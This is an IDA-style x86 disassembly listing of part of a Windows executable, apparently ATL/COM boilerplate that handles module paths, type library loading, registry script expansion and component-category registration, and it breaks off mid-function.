align 10h
; =============== S U B R O U T I N E =======================================
sub_4023F0 proc near ; DATA XREF: .rdata:0040F5A4�o
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, [eax]
push offset dword_40F524
push offset aAppid_0 ; "APPID"
push eax
call dword ptr [ecx+0Ch]
retn 4
sub_4023F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402410 proc near ; CODE XREF: sub_4025B0+122�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
mov ebx, [ebp+arg_0]
test ebx, ebx
push esi
push edi
mov [ebp+var_4], ecx
jnz short loc_40242F
xor eax, eax
lea esp, [ebp-10h]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 4
; ---------------------------------------------------------------------------
loc_40242F: ; CODE XREF: sub_402410+F�j
call off_412040
push ebx
mov [ebp+arg_0], eax
xor esi, esi
call ds:dword_40F040 ; lstrlenW
lea edi, [eax+eax+2]
cmp edi, 400h
jg short loc_40246B
push edi
call sub_4010B0
add esp, 4
test al, al
jz short loc_40246B
mov eax, edi
add eax, 3
and eax, 0FFFFFFFCh
call __alloca_probe
mov eax, esp
jmp short loc_402486
; ---------------------------------------------------------------------------
loc_40246B: ; CODE XREF: sub_402410+3B�j
; sub_402410+48�j
lea eax, [edi+8]
push eax ; Size
call _malloc
add esp, 4
test eax, eax
jz short loc_402486
mov dword ptr [eax], 0
mov esi, eax
add eax, 8
loc_402486: ; CODE XREF: sub_402410+59�j
; sub_402410+69�j
mov ecx, [ebp+arg_0]
push ecx
push edi
push ebx
push eax
call sub_401240
mov edi, eax
push edi
call ds:dword_40F084 ; lstrlen
mov ecx, [ebp+var_4]
push eax
push edi
call sub_4015D0
test esi, esi
mov edi, eax
jz short loc_4024C1
jmp short loc_4024B0
; ---------------------------------------------------------------------------
align 10h
loc_4024B0: ; CODE XREF: sub_402410+9B�j
; sub_402410+AF�j
mov eax, esi
mov esi, [esi]
push eax ; Memory
call _free
add esp, 4
test esi, esi
jnz short loc_4024B0
loc_4024C1: ; CODE XREF: sub_402410+99�j
mov eax, edi
lea esp, [ebp-10h]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 4
sub_402410 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4024D0 proc near ; CODE XREF: sub_402550+3�p
; sub_4050C0+A5�p ...
push esi
lea esi, [ecx+4]
mov dword ptr [ecx], offset off_40F528
mov ecx, esi
call loc_402040
mov ecx, esi
call loc_402040
mov eax, [esi]
test eax, eax
jz short loc_4024FD
push eax ; Memory
call _free
add esp, 4
mov dword ptr [esi], 0
loc_4024FD: ; CODE XREF: sub_4024D0+1C�j
mov eax, [esi+4]
test eax, eax
jz short loc_402514
push eax ; Memory
call _free
add esp, 4
mov dword ptr [esi+4], 0
loc_402514: ; CODE XREF: sub_4024D0+32�j
mov dword ptr [esi+8], 0
pop esi
retn
sub_4024D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402520 proc near ; DATA XREF: .rdata:off_40F528�o
mov eax, 80004001h
retn 0Ch
sub_402520 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402530 proc near ; DATA XREF: .rdata:0040F52C�o
mov eax, 1
retn 4
sub_402530 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402540 proc near ; DATA XREF: .rdata:0040F530�o
xor eax, eax
retn 4
sub_402540 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __thiscall sub_402550(void *Memory,char)
sub_402550 proc near ; DATA XREF: .rdata:0040F53C�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
call sub_4024D0
test [esp+4+arg_0], 1
jz short loc_402568
push esi ; Memory
call j__free
add esp, 4
loc_402568: ; CODE XREF: sub_402550+D�j
mov eax, esi
pop esi
retn 4
sub_402550 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402570 proc near ; CODE XREF: sub_4025B0+114�p
arg_0 = byte ptr 4
push esi
lea esi, [ecx+4]
lea eax, [esp+4+arg_0]
push eax
mov ecx, esi
call sub_401C80
cmp eax, 0FFFFFFFFh
jnz short loc_40258B
xor eax, eax
pop esi
retn 4
; ---------------------------------------------------------------------------
loc_40258B: ; CODE XREF: sub_402570+13�j
test eax, eax
jl short loc_40259E
cmp eax, [esi+8]
jge short loc_40259E
mov ecx, [esi+4]
mov eax, [ecx+eax*4]
pop esi
retn 4
; ---------------------------------------------------------------------------
loc_40259E: ; CODE XREF: sub_402570+1D�j
; sub_402570+22�j
push 0
push 0
push 1
push 0C000008Ch
call ds:dword_40F044 ; RaiseException
int 3 ; Trap to Debugger
sub_402570 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4025B0 proc near ; CODE XREF: sub_404BA0+25�p
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
sub esp, 2Ch
push ebx
push ebp
push esi
push edi
mov edi, [esp+3Ch+arg_0]
xor ebp, ebp
cmp edi, ebp
mov esi, ecx
jz loc_40271A
mov ebx, [esp+3Ch+arg_4]
cmp ebx, ebp
jz loc_40271A
push edi
mov [ebx], ebp
call ds:dword_40F084 ; lstrlen
shl eax, 1
cmp eax, 64h
jge short loc_4025E8
mov eax, 3E8h
loc_4025E8: ; CODE XREF: sub_4025B0+31�j
push eax
mov [esp+40h+var_2C], ebp
mov [esp+40h+var_28], eax
call ds:dword_40F25C
cmp eax, ebp
mov [esp+3Ch+var_24], eax
jz loc_402682
mov byte ptr [eax], 0
mov [esi], edi
cmp byte ptr [edi], 0
mov [esp+3Ch+arg_0], ebp
jz short loc_402663
mov ebx, ds:dword_40F230
mov ebp, ds:dword_40F09C
lea ecx, [ecx+0]
loc_402620: ; CODE XREF: sub_4025B0+A7�j
mov edi, [esi]
cmp byte ptr [edi], 25h
push edi
jnz short loc_402634
call ebx ; CharNextA
mov edi, eax
mov [esi], edi
cmp byte ptr [edi], 25h
jnz short loc_402698
push edi
loc_402634: ; CODE XREF: sub_4025B0+76�j
call ebx ; CharNextA
sub eax, edi
push eax
lea ecx, [esp+40h+var_2C]
push edi
call sub_4015D0
test eax, eax
jz loc_40270D
loc_40264B: ; CODE XREF: sub_4025B0+12D�j
; sub_4025B0+13E�j
mov eax, [esi]
push eax
call ebx ; CharNextA
mov ecx, eax
mov [esi], eax
cmp byte ptr [ecx], 0
jnz short loc_402620
mov ebx, [esp+3Ch+arg_4]
mov eax, [esp+3Ch+var_24]
xor ebp, ebp
loc_402663: ; CODE XREF: sub_4025B0+5F�j
mov [esp+3Ch+var_24], ebp
mov [ebx], eax
loc_402669: ; CODE XREF: sub_4025B0+14B�j
; sub_4025B0+158�j ...
mov edx, [esp+3Ch+var_24]
push edx
call ds:dword_40F260
mov eax, [esp+3Ch+arg_0]
pop edi
pop esi
pop ebp
pop ebx
add esp, 2Ch
retn 8
; ---------------------------------------------------------------------------
loc_402682: ; CODE XREF: sub_4025B0+4D�j
push ebp
call ds:dword_40F260
pop edi
pop esi
pop ebp
mov eax, 8007000Eh
pop ebx
add esp, 2Ch
retn 8
; ---------------------------------------------------------------------------
loc_402698: ; CODE XREF: sub_4025B0+81�j
push 25h
push edi
call sub_401770
mov edi, eax
add esp, 8
test edi, edi
jz short loc_402700
mov ecx, [esi]
sub eax, ecx
cmp eax, 1Fh
jg short loc_4026F3
inc eax
push eax
push ecx
lea eax, [esp+44h+var_20]
push eax
call ebp ; lstrcpyn
lea ecx, [esp+3Ch+var_20]
push ecx
mov ecx, [esi+4]
call sub_402570
test eax, eax
jz short loc_402700
push eax
lea ecx, [esp+40h+var_2C]
call sub_402410
test eax, eax
jz short loc_40270D
cmp [esi], edi
jz loc_40264B
loc_4026E3: ; CODE XREF: sub_4025B0+13C�j
mov edx, [esi]
push edx
call ebx ; CharNextA
cmp eax, edi
mov [esi], eax
jnz short loc_4026E3
jmp loc_40264B
; ---------------------------------------------------------------------------
loc_4026F3: ; CODE XREF: sub_4025B0+100�j
mov [esp+3Ch+arg_0], 80004005h
jmp loc_402669
; ---------------------------------------------------------------------------
loc_402700: ; CODE XREF: sub_4025B0+F7�j
; sub_4025B0+11B�j
mov [esp+3Ch+arg_0], 80020009h
jmp loc_402669
; ---------------------------------------------------------------------------
loc_40270D: ; CODE XREF: sub_4025B0+95�j
; sub_4025B0+129�j
mov [esp+3Ch+arg_0], 8007000Eh
jmp loc_402669
; ---------------------------------------------------------------------------
loc_40271A: ; CODE XREF: sub_4025B0+11�j
; sub_4025B0+1D�j
pop edi
pop esi
pop ebp
mov eax, 80004003h
pop ebx
add esp, 2Ch
retn 8
sub_4025B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402730 proc near ; CODE XREF: sub_4029F0+28�p
; sub_402A90+2D�p
var_11C = byte ptr -11Ch
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 11Ch
mov ecx, [ebp+arg_8]
test ecx, ecx
push ebx
push esi
push edi
jz loc_4029CD
mov eax, [ebp+arg_C]
test eax, eax
jz loc_4029CD
mov dword ptr [ecx], 0
mov dword ptr [eax], 0
call off_412040
mov ecx, [ebp+arg_0]
mov [ebp+var_C], eax
push 104h
lea eax, [ebp+var_11C]
push eax
push ecx
mov [ebp+var_4], 0
call ds:dword_40F0A4 ; GetModuleFileNameA
mov ebx, eax
test ebx, ebx
jnz short loc_4027AA
call sub_4013E0
lea ecx, [ebp+var_4]
mov esi, eax
call sub_401C60
mov eax, esi
lea esp, [ebp-128h]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 10h
; ---------------------------------------------------------------------------
loc_4027AA: ; CODE XREF: sub_402730+58�j
cmp ebx, 104h
jnz short loc_4027CE
lea ecx, [ebp+var_4]
call sub_401C60
mov eax, 8007007Ah
lea esp, [ebp-128h]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 10h
; ---------------------------------------------------------------------------
loc_4027CE: ; CODE XREF: sub_402730+80�j
lea edx, [ebp+var_11C]
push edx
call ds:dword_40F1B4
mov edi, [ebp+arg_4]
test edi, edi
mov [ebp+arg_0], eax
jz short loc_402858
push edi
call ds:dword_40F040 ; lstrlenW
lea esi, [eax+eax+2]
cmp esi, 400h
jg short loc_402816
push esi
call sub_4010B0
add esp, 4
test al, al
jz short loc_402816
mov eax, esi
add eax, 3
and eax, 0FFFFFFFCh
call __alloca_probe
mov eax, esp
jmp short loc_40281F
; ---------------------------------------------------------------------------
loc_402816: ; CODE XREF: sub_402730+C6�j
; sub_402730+D3�j
push esi
lea ecx, [ebp+var_4]
call sub_4022E0
loc_40281F: ; CODE XREF: sub_402730+E4�j
mov ecx, [ebp+var_C]
push ecx
push esi
push edi
push eax
call sub_401240
mov esi, eax
test esi, esi
jz loc_402972
push esi
call ds:dword_40F084 ; lstrlen
add eax, ebx
cmp eax, 10Eh
jnb loc_4028F4
push esi
lea edx, [ebp+ebx+var_11C]
push edx
call ds:dword_40F0A0 ; lstrcpy
loc_402858: ; CODE XREF: sub_402730+B3�j
lea eax, [ebp+var_11C]
push eax
call ds:dword_40F084 ; lstrlen
mov esi, eax
inc esi
lea edi, [esi+esi]
cmp edi, 400h
ja short loc_402891
push edi
call sub_4010B0
add esp, 4
test al, al
jz short loc_402891
mov eax, edi
add eax, 3
and eax, 0FFFFFFFCh
call __alloca_probe
mov eax, esp
jmp short loc_40289A
; ---------------------------------------------------------------------------
loc_402891: ; CODE XREF: sub_402730+141�j
; sub_402730+14E�j
push edi
lea ecx, [ebp+var_4]
call sub_4022E0
loc_40289A: ; CODE XREF: sub_402730+15F�j
mov ebx, [ebp+var_C]
push ebx
push esi
lea ecx, [ebp+var_11C]
push ecx
push eax
call sub_401200
mov esi, eax
test esi, esi
jz loc_402972
mov edx, [ebp+arg_C]
push edx
push esi
call ds:dword_40F1A0
mov edi, eax
test edi, edi
jge loc_40299F
mov eax, ds:dword_40F540
mov cl, ds:byte_40F544
mov [ebp+var_C], eax
mov eax, [ebp+arg_0]
mov [ebp+var_8], cl
mov edx, eax
lea ecx, [ebp+var_11C]
sub edx, ecx
add edx, 5
cmp edx, 104h
jbe short loc_402910
loc_4028F4: ; CODE XREF: sub_402730+113�j
lea ecx, [ebp+var_4]
call sub_401C60
mov eax, 80004005h
lea esp, [ebp-128h]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 10h
; ---------------------------------------------------------------------------
loc_402910: ; CODE XREF: sub_402730+1C2�j
lea edx, [ebp+var_C]
push edx
push eax
call ds:dword_40F0A0 ; lstrcpy
lea eax, [ebp+var_11C]
push eax
call ds:dword_40F084 ; lstrlen
mov esi, eax
inc esi
lea edi, [esi+esi]
cmp edi, 400h
ja short loc_402954
push edi
call sub_4010B0
add esp, 4
test al, al
jz short loc_402954
mov eax, edi
add eax, 3
and eax, 0FFFFFFFCh
call __alloca_probe
mov eax, esp
jmp short loc_40295D
; ---------------------------------------------------------------------------
loc_402954: ; CODE XREF: sub_402730+204�j
; sub_402730+211�j
push edi
lea ecx, [ebp+var_4]
call sub_4022E0
loc_40295D: ; CODE XREF: sub_402730+222�j
push ebx
push esi
lea ecx, [ebp+var_11C]
push ecx
push eax
call sub_401200
mov esi, eax
test esi, esi
jnz short loc_40298E
loc_402972: ; CODE XREF: sub_402730+FF�j
; sub_402730+180�j
lea ecx, [ebp+var_4]
call sub_401C60
mov eax, 8007000Eh
lea esp, [ebp-128h]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 10h
; ---------------------------------------------------------------------------
loc_40298E: ; CODE XREF: sub_402730+240�j
mov edx, [ebp+arg_C]
push edx
push esi
call ds:dword_40F1A0
mov edi, eax
test edi, edi
jl short loc_4029B4
loc_40299F: ; CODE XREF: sub_402730+195�j
push esi
call ds:dword_40F190
test eax, eax
mov ecx, [ebp+arg_8]
mov [ecx], eax
jnz short loc_4029B4
mov edi, 8007000Eh
loc_4029B4: ; CODE XREF: sub_402730+26D�j
; sub_402730+27D�j
lea ecx, [ebp+var_4]
call sub_401C60
mov eax, edi
lea esp, [ebp-128h]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 10h
; ---------------------------------------------------------------------------
loc_4029CD: ; CODE XREF: sub_402730+11�j
; sub_402730+1C�j
mov eax, 80004003h
lea esp, [ebp-128h]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 10h
sub_402730 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4029F0 proc near ; CODE XREF: sub_4047C0+78�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
sub esp, 8
mov edx, [esp+8+arg_4]
push esi
lea eax, [esp+0Ch+var_8]
push eax
mov eax, [esp+10h+arg_0]
lea ecx, [esp+10h+var_4]
push ecx
push edx
push eax
mov [esp+1Ch+var_4], 0
mov [esp+1Ch+var_8], 0
call sub_402730
mov esi, eax
test esi, esi
jl short loc_402A6A
mov eax, [esp+0Ch+var_8]
mov ecx, [eax]
lea edx, [esp+0Ch+arg_4]
push edx
push eax
call dword ptr [ecx+1Ch]
mov esi, eax
test esi, esi
jl short loc_402A6A
mov eax, [esp+0Ch+arg_4]
mov ecx, [eax+14h]
mov edx, [eax+10h]
push ecx
push edx
xor ecx, ecx
mov cx, [eax+1Ah]
xor edx, edx
mov dx, [eax+18h]
push ecx
push edx
push eax
call ds:dword_40F19C
mov edx, [esp+0Ch+arg_4]
mov esi, eax
mov eax, [esp+0Ch+var_8]
mov ecx, [eax]
push edx
push eax
call dword ptr [ecx+30h]
loc_402A6A: ; CODE XREF: sub_4029F0+31�j
; sub_4029F0+46�j
mov eax, [esp+0Ch+var_8]
test eax, eax
jz short loc_402A78
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_402A78: ; CODE XREF: sub_4029F0+80�j
mov edx, [esp+0Ch+var_4]
push edx
call ds:dword_40F194
mov eax, esi
pop esi
add esp, 8
retn 8
sub_4029F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402A90 proc near ; CODE XREF: sub_404730+78�p
Source = dword ptr -210h
var_20C = dword ptr -20Ch
Dest = word ptr -208h
var_2 = word ptr -2
arg_0 = dword ptr 4
arg_4 = dword ptr 8
sub esp, 210h
mov edx, [esp+210h+arg_0]
push ebp
push esi
push edi
mov edi, [esp+21Ch+arg_4]
lea eax, [esp+21Ch+var_20C]
push eax
lea ecx, [esp+220h+Source]
push ecx
push edi
xor ebp, ebp
push edx
mov [esp+22Ch+Source], ebp
mov [esp+22Ch+var_20C], ebp
call sub_402730
mov esi, eax
cmp esi, ebp
jl short loc_402B35
mov eax, [esp+21Ch+Source]
push 103h ; Count
push eax ; Source
lea ecx, [esp+224h+Dest]
push ecx ; Dest
call _wcsncpy
add esp, 0Ch
cmp edi, ebp
mov [esp+21Ch+var_2], bp
jz short loc_402B12
push ebx
mov ebx, ds:dword_40F040
lea edx, [esp+220h+Dest]
push edx
call ebx ; lstrlenW
push edi
mov esi, eax
call ebx ; lstrlenW
sub esi, eax
lea edx, [esp+esi*2+220h+Dest]
mov ecx, eax
mov esi, edx
xor eax, eax
repe cmpsb
pop ebx
jnz short loc_402B12
mov [edx], bp
loc_402B12: ; CODE XREF: sub_402A90+59�j
; sub_402A90+7D�j
lea esi, [esp+21Ch+Dest]
call sub_401A40
mov edx, [esp+21Ch+Source]
mov ecx, esi
push ecx
mov [esp+eax*2+220h+Dest], bp
mov eax, [esp+220h+var_20C]
push edx
push eax
call ds:dword_40F178
mov esi, eax
loc_402B35: ; CODE XREF: sub_402A90+36�j
mov eax, [esp+21Ch+var_20C]
cmp eax, ebp
jz short loc_402B43
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_402B43: ; CODE XREF: sub_402A90+AB�j
mov edx, [esp+21Ch+Source]
push edx
call ds:dword_40F194
pop edi
mov eax, esi
pop esi
pop ebp
add esp, 210h
retn 8
sub_402A90 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=6Ch
sub_402B60 proc near ; CODE XREF: sub_404730+53�p
; sub_4047C0+4A�p ...
var_11C = byte ptr -11Ch
var_9C = byte ptr -9Ch
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
lea ebp, [esp-6Ch]
sub esp, 11Ch
push ebx
mov ebx, [ebp+6Ch+arg_4]
test ebx, ebx
push esi
push edi
mov [ebp+6Ch+var_4], 0
jz loc_402E35
mov edi, [ebp+6Ch+arg_0]
mov eax, [edi]
cmp eax, ds:dword_40FC6C
jnz short loc_402BB2
mov ecx, [edi+4]
cmp ecx, ds:dword_40FC70
jnz short loc_402BB2
mov edx, [edi+8]
cmp edx, ds:dword_40FC74
jnz short loc_402BB2
mov eax, [edi+0Ch]
cmp eax, ds:dword_40FC78
jz loc_402E35
loc_402BB2: ; CODE XREF: sub_402B60+2B�j
; sub_402B60+36�j ...
lea ecx, [ebp+6Ch+var_4]
push ecx
push offset dword_40F580
push 1
push 0
push offset dword_40FC5C
call ds:dword_40F26C
test eax, eax
jge short loc_402BF3
mov eax, [ebp+6Ch+var_4]
test eax, eax
jz loc_402E35
mov edx, [eax]
push eax
call dword ptr [edx+8]
xor eax, eax
lea esp, [ebp-0BCh]
pop edi
pop esi
pop ebx
add ebp, 6Ch
mov esp, ebp
pop ebp
retn 0Ch
; ---------------------------------------------------------------------------
loc_402BF3: ; CODE XREF: sub_402B60+6C�j
cmp dword ptr [ebx], 0
jz loc_402C85
lea esp, [esp+0]
loc_402C00: ; CODE XREF: sub_402B60+11F�j
mov eax, [ebx+4]
mov ecx, [eax]
mov [ebp+6Ch+var_18], ecx
mov edx, [eax+4]
mov [ebp+6Ch+var_14], edx
mov ecx, [eax+8]
mov [ebp+6Ch+var_10], ecx
mov edx, [eax+0Ch]
mov eax, [ebp+6Ch+arg_8]
mov [ebp+6Ch+var_C], edx
lea edx, [ebp+6Ch+var_18]
push edx
push 1
test eax, eax
mov eax, [ebx]
push edi
jz short loc_402C64
cmp eax, 1
mov eax, [ebp+6Ch+var_4]
mov ecx, [eax]
push eax
jnz short loc_402C3A
call dword ptr [ecx+14h]
jmp short loc_402C3D
; ---------------------------------------------------------------------------
loc_402C3A: ; CODE XREF: sub_402B60+D3�j
call dword ptr [ecx+1Ch]
loc_402C3D: ; CODE XREF: sub_402B60+D8�j
mov esi, eax
test esi, esi
jge short loc_402C77
mov eax, [ebp+6Ch+var_4]
test eax, eax
jz short loc_402C50
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_402C50: ; CODE XREF: sub_402B60+E8�j
mov eax, esi
lea esp, [ebp-0BCh]
pop edi
pop esi
pop ebx
add ebp, 6Ch
mov esp, ebp
pop ebp
retn 0Ch
; ---------------------------------------------------------------------------
loc_402C64: ; CODE XREF: sub_402B60+C8�j
cmp eax, 1
mov eax, [ebp+6Ch+var_4]
mov ecx, [eax]
push eax
jnz short loc_402C74
call dword ptr [ecx+18h]
jmp short loc_402C77
; ---------------------------------------------------------------------------
loc_402C74: ; CODE XREF: sub_402B60+10D�j
call dword ptr [ecx+20h]
loc_402C77: ; CODE XREF: sub_402B60+E1�j
; sub_402B60+112�j
mov eax, [ebx+8]
add ebx, 8
test eax, eax
jnz loc_402C00
loc_402C85: ; CODE XREF: sub_402B60+96�j
mov eax, [ebp+6Ch+arg_8]
test eax, eax
jnz loc_402E28
push 40h
lea edx, [ebp+6Ch+var_11C]
push edx
push edi
call ds:dword_40F270
call off_412040
mov edi, eax
lea eax, [ebp+6Ch+var_11C]
push eax
mov [ebp+6Ch+arg_0], 0
call ds:dword_40F040 ; lstrlenW
lea esi, [eax+eax+2]
cmp esi, 400h
jg short loc_402CE6
push esi
call sub_4010B0
add esp, 4
test al, al
jz short loc_402CE6
mov eax, esi
add eax, 3
and eax, 0FFFFFFFCh
call __alloca_probe
mov eax, esp
jmp short loc_402CEF
; ---------------------------------------------------------------------------
loc_402CE6: ; CODE XREF: sub_402B60+166�j
; sub_402B60+173�j
push esi
lea ecx, [ebp+6Ch+arg_0]
call sub_4022E0
loc_402CEF: ; CODE XREF: sub_402B60+184�j
push edi
push esi
lea ecx, [ebp+6Ch+var_11C]
push ecx
push eax
call sub_401240
mov edi, eax
test edi, edi
jz loc_402E20
mov ebx, ds:dword_40F0A0
push offset aClsid ; "CLSID\\"
lea edx, [ebp+6Ch+var_9C]
push edx
call ebx ; lstrcpy
mov esi, ds:dword_40F0A8
push edi
lea eax, [ebp+6Ch+var_9C]
push eax
call esi ; lstrcat
push offset aRequiredCatego ; "\\Required Categories"
lea ecx, [ebp+6Ch+var_9C]
push ecx
call esi ; lstrcat
push 20019h
lea edx, [ebp+6Ch+var_9C]
xor eax, eax
push edx
push 80000000h
lea ecx, [ebp+6Ch+arg_8]
mov [ebp+6Ch+var_8], 80000000h
mov [ebp+6Ch+arg_8], eax
mov [ebp+6Ch+arg_4], eax
call sub_4014F0
test eax, eax
jnz short loc_402D9D
push eax
mov ecx, [ebp+6Ch+arg_8]
push eax
push eax
push eax
push eax
push eax
push eax
lea eax, [ebp+6Ch+arg_4]
push eax
push 0
push 0
push 0
push ecx
call ds:dword_40F014 ; RegQueryInfoKeyA
lea ecx, [ebp+6Ch+arg_8]
mov [ebp+6Ch+var_1C], eax
call sub_4014D0
mov eax, [ebp+6Ch+var_1C]
test eax, eax
jnz short loc_402D9D
mov eax, [ebp+6Ch+arg_4]
test eax, eax
jnz short loc_402D9D
lea edx, [ebp+6Ch+var_9C]
push edx
push 80000000h
call ds:dword_40F008 ; RegDeleteKeyA
loc_402D9D: ; CODE XREF: sub_402B60+1F8�j
; sub_402B60+225�j ...
push offset aClsid ; "CLSID\\"
lea eax, [ebp+6Ch+var_9C]
push eax
call ebx ; lstrcpy
push edi
lea ecx, [ebp+6Ch+var_9C]
push ecx
call esi ; lstrcat
push offset aImplementedCat ; "\\Implemented Categories"
lea edx, [ebp+6Ch+var_9C]
push edx
call esi ; lstrcat
push 20019h
lea eax, [ebp+6Ch+var_9C]
push eax
push 80000000h
lea ecx, [ebp+6Ch+arg_8]
call sub_4014F0
test eax, eax
jnz short loc_402E10
mov edx, [ebp+6Ch+arg_8]
push eax
push eax
push eax
push eax
push eax
push eax
push eax
lea ecx, [ebp+6Ch+arg_4]
push ecx
push eax
push eax
push eax
push edx
call ds:dword_40F014 ; RegQueryInfoKeyA
lea ecx, [ebp+6Ch+arg_8]
mov esi, eax
call sub_4014D0
test esi, esi
jnz short loc_402E10
mov eax, [ebp+6Ch+arg_4]
test eax, eax
jnz short loc_402E10
lea eax, [ebp+6Ch+var_9C]
push eax
push 80000000h
call ds:dword_40F008 ; RegDeleteKeyA
loc_402E10: ; CODE XREF: sub_402B60+272�j
; sub_402B60+298�j ...
lea ecx, [ebp+6Ch+arg_8]
call sub_401ED0
lea ecx, [ebp+6Ch+var_8]
call sub_401ED0
loc_402E20: ; CODE XREF: sub_402B60+1A2�j
lea ecx, [ebp+6Ch+arg_0]
call sub_401C60
loc_402E28: ; CODE XREF: sub_402B60+12A�j
mov eax, [ebp+6Ch+var_4]
test eax, eax
jz short loc_402E35
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_402E35: ; CODE XREF: sub_402B60+1A�j
; sub_402B60+4C�j ...
xor eax, eax
lea esp, [ebp-0BCh]
pop edi
pop esi
pop ebx
add ebp, 6Ch
mov esp, ebp
pop ebp
retn 0Ch
sub_402B60 endp
; ---------------------------------------------------------------------------
align 10h
loc_402E50: ; CODE XREF: WinMain(x,x,x,x)+193�p
push ebx
mov ebx, [esp+8]
test ebx, ebx
jnz short loc_402E68
push ebx
push ebx
push 1
push 0C0000005h
call ds:dword_40F044 ; RaiseException
loc_402E68: ; CODE XREF: .text:00402E57�j
push esi
mov esi, [esp+10h]
test esi, esi
jz short loc_402EA5
mov eax, [esp+14h]
test eax, eax
jz short loc_402EA5
push edi
mov [esi], eax
call ds:dword_40F0AC ; GetCurrentThreadId
lea edi, [ebx+4]
push edi
mov [esi+4], eax
call ds:dword_40F048 ; RtlEnterCriticalSection
mov eax, [ebx+1Ch]
mov [esi+8], eax
push edi
mov [ebx+1Ch], esi
call ds:dword_40F04C ; RtlLeaveCriticalSection
pop edi
pop esi
pop ebx
retn 0Ch
; ---------------------------------------------------------------------------
loc_402EA5: ; CODE XREF: .text:00402E6F�j
; .text:00402E77�j
push 0
push 0
push 1
push 0C0000005h
call ds:dword_40F044 ; RaiseException
; ---------------------------------------------------------------------------
db 0Ah dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_402EC0 proc near ; CODE XREF: .text:00404B57�p
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
test edi, edi
jnz short loc_402ECF
xor eax, eax
pop edi
retn 4
; ---------------------------------------------------------------------------
loc_402ECF: ; CODE XREF: sub_402EC0+7�j
push ebx
push ebp
push esi
lea ebp, [edi+4]
push ebp
xor ebx, ebx
call ds:dword_40F048 ; RtlEnterCriticalSection
mov esi, [edi+1Ch]
test esi, esi
jz short loc_402F32
call ds:dword_40F0AC ; GetCurrentThreadId
xor ecx, ecx
lea ecx, [ecx+0]
loc_402EF0: ; CODE XREF: sub_402EC0+3C�j
cmp [esi+4], eax
jz short loc_402F0E
mov ecx, esi
mov esi, [esi+8]
test esi, esi
jnz short loc_402EF0
push ebp
call ds:dword_40F04C ; RtlLeaveCriticalSection
pop esi
pop ebp
mov eax, ebx
pop ebx
pop edi
retn 4
; ---------------------------------------------------------------------------
loc_402F0E: ; CODE XREF: sub_402EC0+33�j
test ecx, ecx
jnz short loc_402F2A
mov eax, [esi+8]
mov [edi+1Ch], eax
mov ebx, [esi]
push ebp
call ds:dword_40F04C ; RtlLeaveCriticalSection
pop esi
pop ebp
mov eax, ebx
pop ebx
pop edi
retn 4
; ---------------------------------------------------------------------------
loc_402F2A: ; CODE XREF: sub_402EC0+50�j
mov edx, [esi+8]
mov [ecx+8], edx
mov ebx, [esi]
loc_402F32: ; CODE XREF: sub_402EC0+23�j
push ebp
call ds:dword_40F04C ; RtlLeaveCriticalSection
pop esi
pop ebp
mov eax, ebx
pop ebx
pop edi
retn 4
sub_402EC0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402F50 proc near ; CODE XREF: sub_403BB0+9E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, ecx
mov eax, [esi+8]
mov edx, [esi]
lea ecx, ds:4[eax*4]
push ecx ; NewSize
push edx ; Memory
call _realloc
add esp, 8
test eax, eax
jz short loc_402F8A
mov edx, [esi+4]
mov [esi], eax
mov eax, [esi+8]
lea ecx, ds:4[eax*4]
push ecx ; NewSize
push edx ; Memory
call _realloc
add esp, 8
test eax, eax
jnz short loc_402F90
loc_402F8A: ; CODE XREF: sub_402F50+1B�j
xor eax, eax
pop esi
retn 8
; ---------------------------------------------------------------------------
